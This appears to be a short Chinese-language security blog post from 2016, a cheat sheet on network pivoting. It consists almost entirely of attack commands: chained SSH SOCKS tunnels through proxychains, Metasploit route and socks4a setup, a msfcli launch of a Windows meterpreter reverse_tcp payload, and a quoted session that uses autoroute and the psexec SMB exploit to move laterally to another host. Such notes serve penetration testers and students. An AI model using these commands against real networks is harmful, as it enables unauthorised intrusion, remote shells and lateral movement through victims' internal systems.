MENU

SSH 穿透的各种姿势

September 27, 2016 • Security

SSH 穿透

ssh -D 127.0.0.1:1080 -p 22 user@IP  
Add socks4 127.0.0.1 1080 in /etc/proxychains.conf  
proxychains commands target  

SSH 穿透从一个网络到另一个网络

ssh -D 127.0.0.1:1080 -p 22 user1@IP1  
Add socks4 127.0.0.1 1080 in /etc/proxychains.conf  
proxychains ssh -D 127.0.0.1:1081 -p 22 user1@IP2  
Add socks4 127.0.0.1 1081 in /etc/proxychains.conf  
proxychains commands target  

使用 metasploit 进行穿透

route add X.X.X.X 255.255.255.0 1  
use auxiliary/server/socks4a  
run  
proxychains msfcli windows/* PAYLOAD=windows/meterpreter/reverse_tcp LHOST=IP LPORT=443 RHOST=IP E

或者

# http://www.offensive-security.com/metasploit-unleashed/pivoting/
meterpreter > ipconfig  
IP Address  : 10.1.13.3  
meterpreter > run autoroute -s 10.1.13.0/24  
meterpreter > run autoroute -p  
10.1.13.0          255.255.255.0      Session 1  
meterpreter > Ctrl+Z  
msf auxiliary(tcp) > use exploit/windows/smb/psexec  
msf exploit(psexec) > set RHOST 10.1.13.2  
msf exploit(psexec) > exploit  
meterpreter > ipconfig  
IP Address  : 10.1.13.2  
Tags: None
Archives QR Code
QR Code for this page
Tipping QR Code